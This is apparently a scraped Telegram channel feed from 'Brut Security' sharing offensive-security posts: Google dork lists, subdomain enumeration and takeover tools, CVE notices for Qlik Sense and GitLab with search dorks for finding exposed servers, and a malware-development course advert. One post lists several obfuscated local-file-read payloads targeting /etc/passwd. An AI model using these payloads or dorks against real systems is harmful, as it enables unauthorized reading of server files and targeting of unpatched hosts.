Brut Security
14.8K subscribers
919 photos
73 videos
287 files
974 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
🀨5πŸ—Ώ3πŸ‘2❀1
All Dorks.txt
5.1 KB
Dorks List
❀8πŸ”₯3πŸ‘2
πŸ”–Subhunter - A fast subdomain takeover tool


πŸ“±Github: https://github.com/umutcamliyurt/Subhunter
Please open Telegram to view this post
VIEW IN TELEGRAM
1❀7πŸ‘3πŸ”₯2
CVE-2024-55579, -55580: RCE and Broken Access Control in Qlik Sense, 7.5 - 8.8 rating❗️

Vulnerabilities discovered in Qlik Sense allow attackers to run EXE files on the server, as well as remotely execute commands, potentially affecting confidentiality and integrity.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/9ok2E
πŸ‘‰ Dork: http.title:"Qlik Sense"

Vendor's advisory: https://community.qlik.com/t5/Official-Support-Articles/High-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows-CVEs/tac-p/2496004
πŸ‘8
CENT Tool

Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place.

πŸ“± CENT Tool πŸ“±
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6❀4πŸ‘4
β˜„οΈHere’s a list of tools to streamline your work with Google Dorks and other search engines:
dorki.io
taksec.github.io/google-dorks-bug-bounty/
dorksearch.com
dorkme.comdorkgenius.com
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3
Brut Security Website is now live- Visit- https://brutsec.com/
πŸ‘14πŸ—Ώ3
Did you know that you can smuggle payloads in your email & phone number if incorrect validation is done!
πŸ”₯9πŸ‘3
Payloads for LFR/LFD βš”οΈ
file:/etc/passwd%3F/ 
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
❀4πŸ‘4
BLACKFRIDAY2024 SALE: Get all of our malware development and red teaming courses bundle for only $199.

❌$400
βœ…$199

Start your new year with developing malware and building offensive tools

redteamsorcery.teachable.com/p/learnthemall
🀨3πŸ‘2❀1
CVE-2024-11274, -8233, other: Multiple vulnerabilities in GitLab, 7.5 - 8.7 rating❗

In a new release, GitLab talked about two important vulnerabilities. One of them allows attacker to carry out DoS, the second allows to steal session data and potentially gain unauthorized access to accounts. Several smaller vulnerabilities are also mentioned.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/xM1vs
πŸ‘‰ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2024/12/11/patch-release-gitlab-17-6-2-released/
πŸ‘4🀨2
πŸ—Ώ13πŸ”₯7❀4πŸ‘4
🐳6πŸ‘3
✨In the world of cybersecurity, there is no mercyβ€”only the relentless pursuit of vulnerabilities. Hunt with precision, adapt with resilience, and remember: it’s hunt or be hunted. For those of us climbing to the top of the food chain, there can be no mercyβ€”only one rule: hunt or be hunted.✨
Please open Telegram to view this post
VIEW IN TELEGRAM
❀10πŸ”₯4πŸ‘1
πŸ”– Dnsbruter - A powerful tool for active subdomain enumeration and discovery.

✨ Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.

πŸ”— https://github.com/RevoltSecurities/Dnsbruter/
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯12πŸ‘4